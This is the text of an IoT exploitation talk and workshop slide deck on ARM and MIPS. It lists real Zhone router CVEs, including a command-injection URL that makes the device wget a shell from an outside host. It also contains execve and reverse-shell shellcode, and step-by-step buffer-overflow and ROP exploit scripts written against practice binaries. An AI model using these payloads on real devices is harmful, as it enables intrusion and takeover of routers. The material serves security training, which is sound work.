This is a light training/presentation talk. My name is Lyon Yang and I am an IoT hacker. I live in sunny Singapore where IoT is rapidly being deployed – in production. This walkthrough will aim to shed light on the subject of IoT, from finding vulnerabilities in IoT devices to getting shiny hash prompts. Our journey starts with a holistic view of IoT security, the issues faced by IoT devices and the common mistakes made by IoT developers. Things will then get technical as we progress into a both ARM and MIPS exploitation, followed by a ‘hack-along-with-us’ workshop where you will be exploiting a commonly found IoT daemon. If you are new to IoT or a seasoned professional you will likely learn something new in this workshop. https://www.iotvillage.org/#schedule

1. 0
Practical IoT Exploitation
(ARM & MIPS)
Lyon Yang / @l0Op3r – Vantage Point Security

2. 1
• Hi everyone my name is Lyon Yang
• I hack IoT and embedded systems.
• I live in sunny Singapore.
• Singapore is a smart city with IoT already deployed.
• Taxi drivers in SG will become robots.
• I work at a company called Vantage Point
• Strongest technical team in Singapore/SE Asia.
• Large collective of passionate hackers.
• Working in the financial and government sectors.

3. 2
Today I want to share with you a story:
1 year ago, I set about to try and become the “corelan” of ARM
and MIPS exploitation - a formidable task!
I wanted to fully understand embedded systems and try to
contribute back into the community.
and in the process pop many shells!

4. 3
Who Am I ?
• I am a rather regular guy…
• Basic understanding of ASM and exploitation
• Attended some training events myself
• Corelan, HITB, OSCP
• Practice Makes Perfect
• I started buying embedded devices and ‘playing’
• Working on IoT till 2-3am most mornings.

5. 4
1990s
The state of IoT and embedded security.
• Equally as immature as the tools.
• “1990 called”- Send our bugs back
• Basic strcpy/memcpy exploits
• Not much privilege separation
• Unsecured host OS
• Backdoors are often ‘vendor features’
• Not all vendors care about security

6. 5
Attack Surface
Attack Surface of IoT
• Think of IoT devices as miniature computers
• ARM or MIPS CPU
• “Hard-Drive” is a memory IC
• Runs Linux (typically)
• Communicate over WiFi/Wired
• HTTPD, UnPnP, FTPD, SSHD, TelnetD

7. 6
At Vantage Point I work with IoT vendors within SE Asia
• Network Services (httpd/telnetd…)
• Found more stack overflows than you can count
• “Every string was insecurely handled”
• Admin “restricted” Shells
command1 | sh
sh
dumpmem/readmem

8. 7
Bugs
• Backdoor User(s)
• Security Implemented in Client Side
• Debug interfaces left active
• File Upload -> Shell
• Arbitrary File Read (../../../../)
• Command Injection
• Stack Overflows
• Unauthorized Remote Access via UPnP

9. 8
Developers typically modify open source software
• Customized to meet their own needs.
• MicroHTTPD, BusyBox.
• This requires you are a strong C, C++ Developer
• Most developers now-a-days, are not so strong.
• Customizations exactly where we find bugs.
• Stack Overflows in vendor modifications
• Additional File Handlers or HTTP Methods
• Authentication
• Password Reset
• Log File Access

10. 9
ZHONE
Zhone Technologies is a Global Leader in Fiber
Access Transformation for Service Provider and
Enterprise Networks!
• Based in the US
Reference
from
zhone.com

11. 10
Telcos using Zhone Routers
Reference from Shodan

12. 11
Privilege Escalation
CVE-2014-8356 Privilege Escalation via Javascript Controls
• Access Control via Javascript! (Horrible!)
• Direct Object Reference to administrative functions!

13. 12
Plaintext Passwords
All username and passwords usually found in the
backup settings file!
CVE-2014-8537– Exposed Plaintext Username &
Passwords
• Passwords found to be BASE64 encoded in
backup settings file.
GET /backupsettings.conf?
action=getConfig&sessionKey=

14. 13
Command Injection (Telnetd)
CVE-­‐2014-­‐9118
Command
Injec;on
via
the
telnetd
session
#
download-­‐sw
“Dp://123:213@213/;ls
-­‐la”

15. 14
Command Injection (HTTPD)
Favourite way to look for Command Injection via IDA Pro:
Search for keyword “shell” in IDA PRO:
Sample
Exploit:
/zhnping.cmd?
&test=traceroute&sessionKey=985703201&ipA
ddr=192.168.1.1|wget%20h5p://
192.168.1.17/shell%20-­‐O%20/tmp/
shell&Wl=30&wait=3&queries=3

16. 15
x41x41x41x41
GET /.htmlAAAAA…(7000 ‘A’)…AAAA.html
POST /.tst HTTP/1.1
Host: 192.168.1.1
AAAA…..AAAA (7000 Characters)

17. 16
Stack Executable
Stack
commonly
found
to
be
executable

18. 17
• ASLR
• Bad Characters
• Auto-Killing Process
Monitoring
• Cache Incoherency
Common Exploit Writing Issues

19. 18
Cache Incoherency
Reference:
hWp://community.arm.com/groups/processors/blog/2010/02/17/caches-­‐and-­‐self-­‐modifying-­‐code

20. 19
Cache Incoherency
• Self-modifying code (Encoder/Decoder) would
commonly cause Cache Incoherency
• Instructions stored in Instruction Cache will
execute instead of Data Cache
• Modified Shellcode is stored in Data Cache and
will not execute
Reference:
hWp://community.arm.com/groups/processors/blog/2010/02/17/caches-­‐and-­‐self-­‐modifying-­‐code

21. 20
Overcome Cache Incoherency
• Flush the cache.
• Encode and decode only the data portion of the
shellcode.
Data is not considered as Instructions!

22. 21
Decoding Data
Decoder
Shellcode
(Instruc;ons)
Shellcode
(Encoded
Data)
Decode
Read
Data
Shellcode
(Decoded
Data)
Instruc;on
Cache
Data
Cache

23. 22
MIPS Exploit Writing
Clear Cache
à Use ROP Gadget to clear cache
ASLR
à Use ROP Gadget to jump to Stack
Bad Characters
à Wrote your own encoder
Auto-Respawn Process Monitoring
à Fork the Shellcode Process

24. 23
0-Day Demo
DEMO

25. 24
ARMEncoder
ARMCoder (Alpha Stage)
Ultimate tool to crafting your shellcode
• Mthumb encoder (Encodes all or part of your ARM Shellcodes)
• Provides you with an encoder
• Objdump your shellcode binary to specific formats like C: "x41x42x43x44”
Upcoming features
• Detects for bad characters
• 32bit encoder
• Generates Shellcode
• Accept other forms of shellcode input. (Currently only supports reading from binary)
• Added support for MIPS Architecture
Download Link: https://github.com/l0Op3r/ARMCoder

26. 25
ARM Exploitation Workshop
• Triggering stack overflows to ARM shell.
• Learn ASLR bypass with ROP the ARM way
• Learn briefly how to read shellcode for the ARM
architecture
• Get your shiny Hash Prompt!

27. 26
Required Setup
Requires:
Kali with Python
SSID: random2
Password: iotvillage!
(small caps)
Credentials on the piece of paper.
ssh <userid>@192.168.1.<ip>

28. 27
Setup
Step 1: Download materials on your client
wget http://192.168.1.1:8000/materials.tar
wget http://192.168.1.1:8000/lyonslides.pdf
Step 2: Extract materials
tar –xvf materials.tar
Use any of the assigned ports to listen on from the server.
Port <As Assigned>

29. 28
What are we hacking?
Buffer overflow in two applications:
• Simple Bufferoverflow without ASLR
~/materials/server/practicelab1/httpdserver
• Bufferoverflow with ASLR
Hint use ROP Gadgets from binary “server”
~/materials/server/practicelab2/server

30. 29
StackOverflow x41x41x41x41
What is a Stack Overflow?
Program tries to use more memory space than the
call stack has available.
Register
PC
(Program
Counter)
Register
SP
(Stack
Pointer)
AAAAAA
AAAAAA
AAAAAA
AAAAn
Saved
$PC
Strcpy()
writes
this
way

31. 30
Running Server with GDB
On Server:
1. cd /home/hacker1/materials/server/practice_lab1/
./httpdserver < Any port you are assigned to>
2. Example:
Enter: ./httpdserver 10000 &
3. Output: [2324] ß Process ID
4. gdb attach <PID>
Example: gdb attach 2324
5. Press continue in gdb:
c

32. 31

33. 32
Running Exploit
Python script sends 950 ‘A’s to server
On Client (Kali Linux):
1. cd materials/client/
2. python arm_practice_lab_0.py <Assigned Server
IP> <Port you run server on>
Example: python arm_practice_lab_0.py 192.168.1.4
10000

34. 33
Stack Overflow Triggered

35. 34
We have control over PC
Server:
Type
“info
registers”
or
“i
r”
in
gdb

36. 35
Server
Server:
Re-run httpdserver and attach with gdb
Example:
./httpdserver <port no> &
gdb attach <pid>

37. 36
Register r15/PC
What is the program counter (PC) used for?
Address (Location) of next instruction to be
executed.
As each instruction gets fetched the program
counter increases its value by 2 or 4
Register
PC
(Program
Counter)
Register
SP
(Stack
Pointer)
AAAAAA
AAAAAA
AAAAAA
AAAAn
AAAA
Strcpy()
writes
this
way
Calculate
Offset
to
$PC

38. 37
OFFSETS
How do we locate the offset to PC?
Client:
• /usr/share/metasploit-framework/tools/
pattern_create.rb 950

39. 38
OFFSETS
Client:
In the python script “arm_practice_lab_0.py” modify “buffer”:
Copy and paste the pattern generated by pattern_create.rb
Example: buffer = “aAbB-----yYzZ”
Run edited python script:
python arm_practice_lab_0.py <Assigned Server IP> <Port you run
server on>
Answer in: materials/client/answers/arm_practice_lab_1.py

40. 39
Server:
1. Type
“info
registers”
or
“i
r”
in
gdb
2. Copy
address
in
Program
Counter
Register
(PC)
Example:0x72413970
Getting the pattern offset

41. 40
Locating offset to PC
Client:
1. Enter the following command:
/usr/share/metasploit-framework/tools/pattern_offset.rb <Copied Address>
2. Modify python script to confirm the offset is correct:
buffer= 'A'*508
buffer+= 'B'*4
buffer+= ‘C’ * (950 – len(buffer))
Answer
in:
materials/client/answers/arm_pracNce_lab_2.py
3. Run edited python script
(On the server remember to Re-­‐run
h5pdserver
and
aWach
with
gdb):
python arm_practice_lab_0.py <Assigned Server IP> <Port you run server on>

42. 41
Where to put our shellcode?
Server:
1. Confirm that register PC has been overwritten by
‘x42x42x42x42’ by typing the following in gdb :
“i r”
2. Find out where the stack pointer is pointing to?
By typing the following in gdb:
“x/8a $sp-4”
3. Copy the address stored at register $sp address.
Example: 0x7efff680

43. 42
Where is $SP pointing to?

44. 43
Add stack location to the script
Client:
1. Modify python script to confirm that the PC has
jumped to the right location:
buffer='A'*508
buffer+='x80xf6xffx7e'
buffer += 'C' * (950-len(buffer)) ßShellcode
Answer in: materials/client/answers/
arm_practice_lab_3.py

45. 44
Shellcoding
Why learn shellcoding?
Lots of shellcodes to be used for free online!
In Exploit Development, there will be a lot of hoops
and obstacles to jump through:
- Modification to shellcode
- Bad Characters

46. 45
Bad Characters!
Common Bad Characters:
“x00x20x0a”
Functions like strcpy() terminate after null byte!
Common solution:
Encode the shellcode!

47. 46
ARM Registers

48. 47
Important ARM Instructions
MOV r1, #1
Moving #1 to register r1
ADD r1, r2, #3
Adding #3 to Register R2 and moving it to R1
SUB r1, r2, #3
Subtracting #3 from R2 and moving it to R1

49. 48
Important ARM Instructions
SVC 1
Service Call –
syscall() is a small library function that invokes the system
call whose assembly language interface has the specified
number with the specified arguments.
LDR r5, [pc, #4]
Load value from Address Location (Register R3 with offset #4)
into R5
STR r4, [pc, #4]
Take value from register R4 and store it at Address Location
(Register R3 with offset #4)

50. 49
Important ARM Instructions
Branch (B, BL, BX, BLX, and BXJ) instructions
Branch like Jump Instructions (JMP) in x86
Example:
B R3
http://infocenter.arm.com/help/index.jsp?topic=/
com.arm.doc.dui0204j/Cihfddaf.html

51. 50
SYSCALL
Where to find the syscall offset to use?
# cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep execve
#define __NR_execve (__NR_SYSCALL_BASE+ 11)
Register r7 is used to store the location of the syscall to execute

52. 51
execve
int execve(const char *filename, char *const argv[], char
*const envp[]);
r0 => //bin/shn
r1 => //bin/shn
r2 => 0
r7 => 11 (syscall)
r0 => 0

53. 52
Sample execve shellcode
_start:
.code 32
add r3, pc, #1
bx r3 ç Switch to "Thumb Mode (16-bit)”
.code 16
mov r0, pc ß (We place the address of pc in r0)
add r0, #10 ß Add 10 to r0 (point to //bin/sh)
str r0, [sp, #4] ß Place it on the stack
add r1, sp, #4 ß Copy location of /bin/sh to r1
sub r2, r2, r2 ß “Set r2 to 0” (Null byte free instructions)
mov r7, 11 ß syscall execve in r7
svc 1 ß Execute syscall
.ascii "//bin/sh0”

54. 53
Wait for Shell
Client:
Listen on port 31337:
nc –lvp 31337

55. 54
Server:
1. Change to shellcode directory:
cd ~/materials/shellcode/
2. Edit forkshellcode.s to your client IP Address:
.short 0x697a
.byte 192,168,1,3 ßYour own IP Address
.ascii "//bin//sh00"
3. Compile the shellcode:
#as –mthumb –o fork_shellcode.o fork_shellcode.s
#ld –o fork_shellcode fork_shellcode.o
4. Execute the shellcode:
./fork_shellcode

56. 55
A
shell
should
return
on
your
netcat
listener

57. 56
Fork()

58. 57
Fork Shellcode
Why Fork()?
• More stable exploit as shellcode process is
spawned as a new process
• A process that monitors critical services for
failure and respawns/kills process. (Commonly
found in embedded devices)

59. 58
Pop Shell
Exploiting the binary and
getting our first shell!
Python ARMCoder.py –scb
<binary> -be

60. 59
Server:
1. Dump forkshellcode binary in python format:
• cd ~/materials/client
• python ARMCoder.py –be –scb ~/materials/
shellcode/fork_shellcode

61. 60
`
Client:
1. Copy output and paste into python script. Replace ‘C’ with shellcode:
(May want to edit: materials/client/answers/arm_practice_lab_4.py)
buffer+='x80xf6xffx7e’
buffer+=("xe2x8fx10x01”
"xe1x2fxffx11”
…
"x00x68x00x00")
2. Listen on port 31337:
nc –lvp 31337
3. Run edited python script:
(Remember to Re-run httpdserver and attach with gdb on the server):
python arm_practice_lab_0.py <Assigned Server IP> <Port you run
server on>
4. Check for shell on netcat listener

62. 61
Reverse Shell
A
shell
should
return
on
your
netcat
listener

63. 62
Common Problem
What is ASLR?
Address space layout randomization (ASLR) is a computer
security technique involved in protection from buffer
overflow attacks.
Addresses of Stack and Libraries most of the time
randomized!

64. 63
ROPGadgets
Return-Oriented Programming (ROP):
Attacker uses control of the call stack to indirectly
execute machine instructions
In simple terms, finding and executing machine
instructions found in the httpd binary or libraries.

65. 64
Locating the Right ROPGadget
1. Look for a pivot(ROP GADGET) to jump to stack
Hint:
2. Set and hit Breakpoint in the vulnerable server
In GDB: b *0x<address>
Tools to use:
Johnathan Salwan Tool: ROPGadget.py
OBJDUMP–d <binary>

66. 65
ROPGadget
Server:
1. Change to server directory:
cd ~/materials/server/practice_lab2
2. objdump –d server | grep –B 2 bx

67. 66
ROPGadget
Server:
3. Copy
ROP
Gadget
loca;on
8714:
e28d600c
add
r6,
sp,
#12
8718:
e12fff16
bx
r6
4. Run
materials/server/pracNcelab2/server
<Assigned
Port>
and
aWach
to
gdb
3. In
gdb
set
breakpoint
at
0x8714
and
con;nue:
b
*0x8714
c

68. 67
ROPGadget
Client:
1. Offset has been calculated and located at 520. Modify
python script “python arm_practice_lab2_0.py” and add
ROP gadget to replace PC:
buffer = 'A'*520
buffer += 'x14x87’
Answer: materials/client/answers2/
arm_practice_lab2_1.py
2. Run edited python script:
python arm_practice_lab2_1.py <Assigned Server IP>
<Port you run server on>

69. 68
Breakpoint
Server:
1. Verify that breakpoint 0x8714 hits in the gdb session.
2. Step through code and copy where did the ROP Gadget jump
to:
• stepi
• stepi
• x/8a $pc-4

70. 69
Breakpoint

71. 70
Bad Characters!
Common Bad Characters:
“x00x20x0a”
Functions like strcpy() terminate after null byte!
So what do we normally do?
Encode the shellcode!

72. 71
How to use the ARMCoder
python ARMCoder.py
-scb <Binary>
-spos <starting offset to encode>
-epos <Ending offset to encode>
-be (Endianess)

73. 72
ARMCoder Example

74. 73
ARMCoder Example
Ending
Pos;on:
80be+2
–
8054
=
6C
(Hexadecimal),
108
(Decimal)
Star;ng
Pos;on:
80a8
–
8054
=
54
(Hexadecimal),
84
(decimal)

75. 74
ARMCoder
Server:
1. Change directory to ~/materials/client:
cd ~/materials/client
2. Encode and dump the fork_shellcode using
ARMCoder.py:
python ARMCoder.py -scb ../shellcode/
fork_shellcode -be -spos 84 -epos 108

76. 75
ARMCoder

77. 76
Modifying the Client Exploit
Client:
Modify python script to include the output from ARMCoder.py:
1. Add a NOP for an alignment issue with PC:
nop_mthumb = 'xc0x46’
2. Copy the code mthumb code from ARMCoder:
mthumbmode = "x01x10x8fxe2x11xffx2fxe1”
3. Copy decoder code from ARMCoder:
decoder = "x49xf6x99x14xc9xf6x99x14x4cx21x5a
x23x7dx46xeex58x66x40xee
x50xc0x46x04x33x08x39x24x29xf7xda”

78. 77
ARMCoder
Same
mthumb
code

79. 78
Client
Client:
Edit the following python script:
materials/client/answers2/arm_practice_lab2_1.py
Note: Do not copy mthumb code (first two lines of shellcode
output by ARMCoder.py). Remove from shellcode:
"x01x10x8fxe2”"x11xffx2fxe1"
mthumb code already added the mthumb code in the initial stage.
1. Copy shellcode output from ARMCoder into python script:
shellcode = ("x01x24xb6x1b”
…
"xf1x99x99x99")

80. 79
Copy Shellcode
Copy
This

81. 80
Server
Server:
Re-run server and attach with gdb
Example:
./server <port no> &
gdb attach <pid>

82. 81
Modifying the Client Exploit
Client:
1. Add all required variables to the buffer in the python script:
buffer = mthumbmode + nop_mthumb + decoder +shellcode
buffer += 'A'*(520-len(buffer))
buffer += 'x14x87’
s.send(buffer)
2. Listen on port 31337:
nc –lvp 31337
3. Run edited python script:
python arm_practice_lab2_2.py <Assigned Server IP> <Port you run
server on>

83. 82
Final Exploit

84. 83
NOPS
Why
Add
a
NOP?

85. 84
Register PC Alignment Problem
Why add a NOP?!
Ran through debugger, Shellcode decoded correctly
but shell does not return!
Program Counter often adjusts its offsets
automatically

86. 85
PC auto alignment

87. 86
Awesome References!
• Craig Heffner http://www.devttys0.com/
• Johnathan Salwan http://shell-storm.org/

88. 87
Special Thanks
Bernhard Mueller
Paul Craig
Stefan Streichsbier
Roberto Suggi Liverani
Han Lee
Ryan Baxendale

89. 88
Contact Me
Email:
lyon.yang.s@gmail.com
Twitter/Github: @l0Op3r